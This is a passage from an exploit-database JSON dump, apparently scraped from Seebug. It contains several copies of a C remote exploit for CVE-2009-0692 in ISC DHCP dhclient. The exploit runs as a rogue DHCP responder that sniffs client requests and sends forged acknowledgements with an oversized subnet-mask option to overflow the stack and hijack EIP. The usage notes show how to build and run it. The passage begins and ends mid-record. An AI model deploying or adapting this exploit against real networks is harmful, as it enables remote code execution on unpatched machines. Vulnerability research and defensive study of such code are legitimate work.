00:19:d1:90:e5:4a with xid 0x120f8920\r\n *\r\n * $ gdb /sbin/dhclient\r\n * ...\r\n * DHCPREQUEST on eth0 to 255.255.255.255 port 67\r\n * DHCPACK from 0.6.9.2\r\n * ...\r\n * Program received signal SIGSEGV, Segmentation fault.\r\n * 0x41414141 in ?? ()\r\n * \r\n * Notes:\r\n * \r\n * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free\r\n * to tweak for your target platform. Depends on libdnet and libpcap.\r\n *\r\n * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the \r\n * stack during our overflow. After a successful return from the vulnerable\r\n * script_write_params function, EIP will be set to JMP_TARGET.\r\n *\r\n * Exclusively for use at DEFCON next week. ;-) \r\n */\r\n\r\n#include <ctype.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <dnet.h>\r\n#include <pcap.h>\r\n\r\n#define READABLE_1 "\\xa8\\xfc\\x0b\\x08" /* for es.client */\r\n#define READABLE_2 "\\xbc\\x34\\x0a\\x08" /* for es.prefix */\r\n#define JMP_TARGET "\\x41\\x41\\x41\\x41"\r\n\r\n#define BPF_FILTER "ip and udp and src port 68 and dst port 67"\r\n#define PKT_BUFSIZ 1514\r\n#define DHCP_OP_REQUEST 1\r\n#define DHCP_OP_REPLY 2\r\n#define DHCP_TYPE_REQUEST 3\r\n#define DHCP_TYPE_ACK 5\r\n#define DHCP_OPT_REQIP 50\r\n#define DHCP_OPT_MSGTYPE 53\r\n#define DHCP_OPT_END 255\r\n#define DHCP_CHADDR_LEN 16\r\n#define SERVERNAME_LEN 64\r\n#define BOOTFILE_LEN 128\r\n#define DHCP_HDR_LEN 240\r\n#define DHCP_OPT_HDR_LEN 2\r\n\r\n#ifndef __GNUC__\r\n# define __attribute__(x)\r\n# pragma pack(1)\r\n#endif\r\n\r\nstruct dhcp_hdr {\r\n\tuint8_t op;\r\n\tuint8_t hwtype;\r\n\tuint8_t hwlen;\r\n\tuint8_t hwopcount;\r\n\tuint32_t xid;\r\n\tuint16_t secs;\r\n\tuint16_t flags;\r\n\tuint32_t ciaddr;\r\n\tuint32_t yiaddr;\r\n\tuint32_t siaddr;\r\n\tuint32_t giaddr;\r\n\tuint8_t chaddr[DHCP_CHADDR_LEN];\r\n\tuint8_t servername[SERVERNAME_LEN];\r\n\tuint8_t bootfile[BOOTFILE_LEN];\r\n\tuint32_t cookie;\r\n} __attribute__((__packed__));\r\n\r\nstruct dhcp_opt {\r\n\tuint8_t opt;\r\n\tuint8_t len;\r\n} __attribute__((__packed__));\r\n\r\n#ifndef __GNUC__\r\n# pragma pack()\r\n#endif\r\n\r\nvoid\r\nprocess(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)\r\n{\r\n\teth_t *raw;\r\n\tstruct ip_hdr *ip_h;\r\n\tstruct eth_hdr *eth_h;\r\n\tstruct udp_hdr *udp_h;\r\n\tstruct dhcp_hdr *dhcp_h;\r\n\tstruct dhcp_opt *dhcp_opt;\r\n\tchar *dev = data, *ptr;\r\n\tchar pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];\r\n\tint opt_len, clen = pkthdr->caplen;\r\n\tuint8_t msg_type = 0, payload_len = 0;\r\n\tuint32_t yiaddr = 0;\r\n\r\n\t/* packet too short */\r\n\tif (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {\r\n\t\treturn;\r\n\t}\r\n\r\n\teth_h = (struct eth_hdr *) pkt;\r\n\tip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);\r\n\tudp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);\r\n\tdhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);\r\n\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);\r\n\r\n\t/* only care about REQUEST opcodes */\r\n\tif (dhcp_h->op != DHCP_OP_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\t/* parse DHCP options */\r\n\twhile (1) {\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_MSGTYPE) {\r\n\t\t\tif (dhcp_opt->len != 1) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\r\n\t\t}\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_REQIP) {\r\n\t\t\tif (dhcp_opt->len != 4) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\r\n\t\t}\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_END) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tif (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len);\r\n\t}\r\n\r\n\t/* only care about REQUEST msg types */\r\n\tif (msg_type != DHCP_TYPE_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\tprintf("[+] snarfed DHCP request from %s with xid 0x%08x\\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid);\r\n\tprintf("[+] sending malicious DHCP response to %s with xid 0x%08x\\n\\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid);\r\n\r\n\t/* construct stack payload */\r\n\tmemset(payload, 0, sizeof(payload));\r\n\tptr = payload;\r\n\tmemset(ptr, 0, 16);\r\n\tptr += 16;\r\n\tmemcpy(ptr, READABLE_1, 4);\r\n\tptr += 4;\r\n\tmemcpy(ptr, READABLE_2, 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 8);\r\n\tptr += 8;\r\n\tmemcpy(ptr, "\\x04\\x00\\x00\\x00", 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 28);\r\n\tptr += 28;\r\n\tmemcpy(ptr, JMP_TARGET, 4);\r\n\tptr += 4;\r\n\tpayload_len = ptr - payload;\r\n\r\n\t/* dhcp header */\r\n\tdhcp_h->op = DHCP_OP_REPLY;\r\n\tmemcpy(&dhcp_h->yiaddr, &yiaddr, 4);\r\n\r\n\t/* normal dhcp options */\r\n\tmemset(options, 0, sizeof(options));\r\n\tptr = options;\r\n\tmemcpy(ptr, "\\x35\\x01\\x05", 3);\r\n\tptr += 3;\r\n\tmemcpy(ptr, "\\x36\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x33\\x04\\x00\\x09\\x3a\\x80", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x03\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x06\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\r\n\t/* malicious subnet mask option */\r\n\tmemcpy(ptr, "\\x01", 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, &payload_len, 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, payload, payload_len);\r\n\tptr += payload_len;\r\n\r\n\tmemcpy(ptr, "\\xff", 1);\r\n\tptr += 1;\r\n\topt_len = ptr - options;\r\n\r\n\t/* construct full packet payload */\r\n\tmemset(pktbuf, 0, sizeof(pktbuf));\r\n\tptr = pktbuf;\r\n\r\n\teth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\\xc1\\x1e\\x20\\x09\\x06\\x92", ETH_TYPE_IP);\r\n\tptr += ETH_HDR_LEN;\r\n\r\n\tip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);\r\n\tptr += IP_HDR_LEN;\r\n\r\n\tudp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\tptr += UDP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, dhcp_h, DHCP_HDR_LEN);\r\n\tptr += DHCP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, options, opt_len);\r\n\tptr += opt_len;\r\n\r\n\tip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\r\n\t/* fire off malicious response */\r\n\traw = eth_open(dev);\r\n\tif (!raw) {\r\n\t\tfprintf(stderr, "[-] error opening raw socket on %s\\n", dev);\r\n\t\texit(1);\r\n\t}\r\n\teth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\teth_close(raw);\r\n}\r\n\r\nvoid\r\nusage(char **argv)\r\n{\r\n\tfprintf(stderr, "usage: %s [-i interface]\\n", argv[0]);\r\n\texit(1);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint ch, ret;\r\n\tchar *dev = NULL;\r\n\tchar errbuf[PCAP_ERRBUF_SIZE];\r\n\tstruct bpf_program bfp;\r\n\tpcap_t *ph;\r\n\t\r\n\topterr = 0;\r\n\r\n\twhile ((ch = getopt(argc, argv, "i:")) != -1) {\r\n\t\tswitch (ch) {\r\n\t\tcase 'i':\r\n\t\t\tdev = optarg;\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tusage(argv);\r\n\t\t}\r\n\t}\r\n\r\n\tif (!dev) {\r\n\t\tdev = pcap_lookupdev(errbuf);\r\n\t\tif (!dev) {\r\n\t\t\tfprintf(stderr, "[-] couldn't find default interface: %s\\n", errbuf);\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\r\n\tph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);\r\n\tif (!ph) {\r\n\t\tfprintf(stderr, "[-] couldn't open interface %s: %s\\n", dev, errbuf);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, "[-] couldn't parse BPF filter: %s\\n", pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tpcap_setfilter(ph, &bfp);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, "[-] couldn't set BPF filter: %s\\n", pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] listening on %s: %s\\n", dev, BPF_FILTER);\r\n\r\n\tpcap_loop(ph, -1, process, dev);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2009-07-27]\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66748"}, {"lastseen": "2017-11-19T18:42:19", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-07-28T00:00:00", "published": "2009-07-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11889", "id": "SSV:11889", "type": "seebug", "title": "ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC", "sourceData": "\n /*\r\n * cve-2009-0692.c\r\n *\r\n * ISC DHCP dhclient < 3.1.2p1 Remote Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n * \r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\r\n * \r\n * Stack-based buffer overflow in the script_write_params method in \r\n * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before \r\n * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to \r\n * execute arbitrary code via a crafted subnet-mask option.\r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet\r\n * $ sudo ./cve-2009-0692\r\n * [+] listening on eth0: ip and udp and src port 68 and dst port 67\r\n * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920\r\n * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920\r\n *\r\n * $ gdb /sbin/dhclient\r\n * ...\r\n * DHCPREQUEST on eth0 to 255.255.255.255 port 67\r\n * DHCPACK from 0.6.9.2\r\n * ...\r\n * Program received signal SIGSEGV, Segmentation fault.\r\n * 0x41414141 in ?? ()\r\n * \r\n * Notes:\r\n * \r\n * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free\r\n * to tweak for your target platform. Depends on libdnet and libpcap.\r\n *\r\n * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the \r\n * stack during our overflow. After a successful return from the vulnerable\r\n * script_write_params function, EIP will be set to JMP_TARGET.\r\n *\r\n * Exclusively for use at DEFCON next week. ;-) \r\n */\r\n\r\n#include <ctype.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <dnet.h>\r\n#include <pcap.h>\r\n\r\n#define READABLE_1 "\\xa8\\xfc\\x0b\\x08" /* for es.client */\r\n#define READABLE_2 "\\xbc\\x34\\x0a\\x08" /* for es.prefix */\r\n#define JMP_TARGET "\\x41\\x41\\x41\\x41"\r\n\r\n#define BPF_FILTER "ip and udp and src port 68 and dst port 67"\r\n#define PKT_BUFSIZ 1514\r\n#define DHCP_OP_REQUEST 1\r\n#define DHCP_OP_REPLY 2\r\n#define DHCP_TYPE_REQUEST 3\r\n#define DHCP_TYPE_ACK 5\r\n#define DHCP_OPT_REQIP 50\r\n#define DHCP_OPT_MSGTYPE 53\r\n#define DHCP_OPT_END 255\r\n#define DHCP_CHADDR_LEN 16\r\n#define SERVERNAME_LEN 64\r\n#define BOOTFILE_LEN 128\r\n#define DHCP_HDR_LEN 240\r\n#define DHCP_OPT_HDR_LEN 2\r\n\r\n#ifndef __GNUC__\r\n# define __attribute__(x)\r\n# pragma pack(1)\r\n#endif\r\n\r\nstruct dhcp_hdr {\r\n\tuint8_t op;\r\n\tuint8_t hwtype;\r\n\tuint8_t hwlen;\r\n\tuint8_t hwopcount;\r\n\tuint32_t xid;\r\n\tuint16_t secs;\r\n\tuint16_t flags;\r\n\tuint32_t ciaddr;\r\n\tuint32_t yiaddr;\r\n\tuint32_t siaddr;\r\n\tuint32_t giaddr;\r\n\tuint8_t chaddr[DHCP_CHADDR_LEN];\r\n\tuint8_t servername[SERVERNAME_LEN];\r\n\tuint8_t bootfile[BOOTFILE_LEN];\r\n\tuint32_t cookie;\r\n} __attribute__((__packed__));\r\n\r\nstruct dhcp_opt {\r\n\tuint8_t opt;\r\n\tuint8_t len;\r\n} __attribute__((__packed__));\r\n\r\n#ifndef __GNUC__\r\n# pragma pack()\r\n#endif\r\n\r\nvoid\r\nprocess(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)\r\n{\r\n\teth_t *raw;\r\n\tstruct ip_hdr *ip_h;\r\n\tstruct eth_hdr *eth_h;\r\n\tstruct udp_hdr *udp_h;\r\n\tstruct dhcp_hdr *dhcp_h;\r\n\tstruct dhcp_opt *dhcp_opt;\r\n\tchar *dev = data, *ptr;\r\n\tchar pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];\r\n\tint opt_len, clen = pkthdr->caplen;\r\n\tuint8_t msg_type = 0, payload_len = 0;\r\n\tuint32_t yiaddr = 0;\r\n\r\n\t/* packet too short */\r\n\tif (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {\r\n\t\treturn;\r\n\t}\r\n\r\n\teth_h = (struct eth_hdr *) pkt;\r\n\tip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);\r\n\tudp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);\r\n\tdhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);\r\n\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);\r\n\r\n\t/* only care about REQUEST opcodes */\r\n\tif (dhcp_h->op != DHCP_OP_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\t/* parse DHCP options */\r\n\twhile (1) {\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_MSGTYPE) {\r\n\t\t\tif (dhcp_opt->len != 1) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\r\n\t\t}\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_REQIP) {\r\n\t\t\tif (dhcp_opt->len != 4) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\r\n\t\t}\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_END) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tif (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len);\r\n\t}\r\n\r\n\t/* only care about REQUEST msg types */\r\n\tif (msg_type != DHCP_TYPE_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\tprintf("[+] snarfed DHCP request from %s with xid 0x%08x\\n", eth_ntoa(&eth_h->eth_src), dhcp_h->xid);\r\n\tprintf("[+] sending malicious DHCP response to %s with xid 0x%08x\\n\\n", eth_ntoa(&eth_h->eth_src), dhcp_h->xid);\r\n\r\n\t/* construct stack payload */\r\n\tmemset(payload, 0, sizeof(payload));\r\n\tptr = payload;\r\n\tmemset(ptr, 0, 16);\r\n\tptr += 16;\r\n\tmemcpy(ptr, READABLE_1, 4);\r\n\tptr += 4;\r\n\tmemcpy(ptr, READABLE_2, 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 8);\r\n\tptr += 8;\r\n\tmemcpy(ptr, "\\x04\\x00\\x00\\x00", 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 28);\r\n\tptr += 28;\r\n\tmemcpy(ptr, JMP_TARGET, 4);\r\n\tptr += 4;\r\n\tpayload_len = ptr - payload;\r\n\r\n\t/* dhcp header */\r\n\tdhcp_h->op = DHCP_OP_REPLY;\r\n\tmemcpy(&dhcp_h->yiaddr, &yiaddr, 4);\r\n\r\n\t/* normal dhcp options */\r\n\tmemset(options, 0, sizeof(options));\r\n\tptr = options;\r\n\tmemcpy(ptr, "\\x35\\x01\\x05", 3);\r\n\tptr += 3;\r\n\tmemcpy(ptr, "\\x36\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x33\\x04\\x00\\x09\\x3a\\x80", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x03\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x06\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\r\n\t/* malicious subnet mask option */\r\n\tmemcpy(ptr, "\\x01", 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, &payload_len, 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, payload, payload_len);\r\n\tptr += payload_len;\r\n\r\n\tmemcpy(ptr, "\\xff", 1);\r\n\tptr += 1;\r\n\topt_len = ptr - options;\r\n\r\n\t/* construct full packet payload */\r\n\tmemset(pktbuf, 0, sizeof(pktbuf));\r\n\tptr = pktbuf;\r\n\r\n\teth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\\xc1\\x1e\\x20\\x09\\x06\\x92", ETH_TYPE_IP);\r\n\tptr += ETH_HDR_LEN;\r\n\r\n\tip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);\r\n\tptr += IP_HDR_LEN;\r\n\r\n\tudp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\tptr += UDP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, dhcp_h, DHCP_HDR_LEN);\r\n\tptr += DHCP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, options, opt_len);\r\n\tptr += opt_len;\r\n\r\n\tip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\r\n\t/* fire off malicious response */\r\n\traw = eth_open(dev);\r\n\tif (!raw) {\r\n\t\tfprintf(stderr, "[-] error opening raw socket on %s\\n", dev);\r\n\t\texit(1);\r\n\t}\r\n\teth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\teth_close(raw);\r\n}\r\n\r\nvoid\r\nusage(char **argv)\r\n{\r\n\tfprintf(stderr, "usage: %s [-i interface]\\n", argv[0]);\r\n\texit(1);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint ch, ret;\r\n\tchar *dev = NULL;\r\n\tchar errbuf[PCAP_ERRBUF_SIZE];\r\n\tstruct bpf_program bfp;\r\n\tpcap_t *ph;\r\n\t\r\n\topterr = 0;\r\n\r\n\twhile ((ch = getopt(argc, argv, "i:")) != -1) {\r\n\t\tswitch (ch) {\r\n\t\tcase 'i':\r\n\t\t\tdev = optarg;\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tusage(argv);\r\n\t\t}\r\n\t}\r\n\r\n\tif (!dev) {\r\n\t\tdev = pcap_lookupdev(errbuf);\r\n\t\tif (!dev) {\r\n\t\t\tfprintf(stderr, "[-] couldn't find default interface: %s\\n", errbuf);\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\r\n\tph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);\r\n\tif (!ph) {\r\n\t\tfprintf(stderr, "[-] couldn't open interface %s: %s\\n", dev, errbuf);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, "[-] couldn't parse BPF filter: %s\\n", pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tpcap_setfilter(ph, &bfp);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, "[-] couldn't set BPF filter: %s\\n", pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] listening on %s: %s\\n", dev, BPF_FILTER);\r\n\r\n\tpcap_loop(ph, -1, process, dev);\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11889", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T16:38:58", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67020", "id": "SSV:67020", "title": "ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability", "type": "seebug", "sourceData": "\n /*\r\n * cve-2009-0692.c\r\n *\r\n * ISC DHCP dhclient < 3.1.2p1 Remote Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n * \r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\r\n * \r\n * Stack-based buffer overflow in the script_write_params method in \r\n * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before \r\n * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to \r\n * execute arbitrary code via a crafted subnet-mask option.\r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet\r\n * $ sudo ./cve-2009-0692\r\n * [+] listening on eth0: ip and udp and src port 68 and dst port 67\r\n * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920\r\n * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920\r\n *\r\n * $ gdb /sbin/dhclient\r\n * ...\r\n * DHCPREQUEST on eth0 to 255.255.255.255 port 67\r\n * DHCPACK from 0.6.9.2\r\n * ...\r\n * Program received signal SIGSEGV, Segmentation fault.\r\n * 0x41414141 in ?? ()\r\n * \r\n * Notes:\r\n * \r\n * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free\r\n * to tweak for your target platform. Depends on libdnet and libpcap.\r\n *\r\n * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the \r\n * stack during our overflow. After a successful return from the vulnerable\r\n * script_write_params function, EIP will be set to JMP_TARGET.\r\n *\r\n * Exclusively for use at DEFCON next week. ;-) \r\n */\r\n\r\n#include <ctype.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <dnet.h>\r\n#include <pcap.h>\r\n\r\n#define READABLE_1 "\\xa8\\xfc\\x0b\\x08" /* for es.client */\r\n#define READABLE_2 "\\xbc\\x34\\x0a\\x08" /* for es.prefix */\r\n#define JMP_TARGET "\\x41\\x41\\x41\\x41"\r\n\r\n#define BPF_FILTER "ip and udp and src port 68 and dst port 67"\r\n#define PKT_BUFSIZ 1514\r\n#define DHCP_OP_REQUEST 1\r\n#define DHCP_OP_REPLY 2\r\n#define DHCP_TYPE_REQUEST 3\r\n#define DHCP_TYPE_ACK 5\r\n#define DHCP_OPT_REQIP 50\r\n#define DHCP_OPT_MSGTYPE 53\r\n#define DHCP_OPT_END 255\r\n#define DHCP_CHADDR_LEN 16\r\n#define SERVERNAME_LEN 64\r\n#define BOOTFILE_LEN 128\r\n#define DHCP_HDR_LEN 240\r\n#define DHCP_OPT_HDR_LEN 2\r\n\r\n#ifndef __GNUC__\r\n# define __attribute__(x)\r\n# pragma pack(1)\r\n#endif\r\n\r\nstruct dhcp_hdr {\r\n\tuint8_t op;\r\n\tuint8_t hwtype;\r\n\tuint8_t hwlen;\r\n\tuint8_t hwopcount;\r\n\tuint32_t xid;\r\n\tuint16_t secs;\r\n\tuint16_t flags;\r\n\tuint32_t ciaddr;\r\n\tuint32_t yiaddr;\r\n\tuint32_t siaddr;\r\n\tuint32_t giaddr;\r\n\tuint8_t chaddr[DHCP_CHADDR_LEN];\r\n\tuint8_t servername[SERVERNAME_LEN];\r\n\tuint8_t bootfile[BOOTFILE_LEN];\r\n\tuint32_t cookie;\r\n} __attribute__((__packed__));\r\n\r\nstruct dhcp_opt {\r\n\tuint8_t opt;\r\n\tuint8_t len;\r\n} __attribute__((__packed__));\r\n\r\n#ifndef __GNUC__\r\n# pragma pack()\r\n#endif\r\n\r\nvoid\r\nprocess(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)\r\n{\r\n\teth_t *raw;\r\n\tstruct ip_hdr *ip_h;\r\n\tstruct eth_hdr *eth_h;\r\n\tstruct udp_hdr *udp_h;\r\n\tstruct dhcp_hdr *dhcp_h;\r\n\tstruct dhcp_opt *dhcp_opt;\r\n\tchar *dev = data, *ptr;\r\n\tchar pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];\r\n\tint opt_len, clen = pkthdr->caplen;\r\n\tuint8_t msg_type = 0, payload_len = 0;\r\n\tuint32_t yiaddr = 0;\r\n\r\n\t/* packet too short */\r\n\tif (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {\r\n\t\treturn;\r\n\t}\r\n\r\n\teth_h = (struct eth_hdr *) pkt;\r\n\tip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);\r\n\tudp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);\r\n\tdhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);\r\n\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);\r\n\r\n\t/* only care about REQUEST opcodes */\r\n\tif (dhcp_h->op != DHCP_OP_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\t/* parse DHCP options */\r\n\twhile (1) {\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_MSGTYPE) {\r\n\t\t\tif (dhcp_opt->len != 1) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\r\n\t\t}\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_REQIP) {\r\n\t\t\tif (dhcp_opt->len != 4) 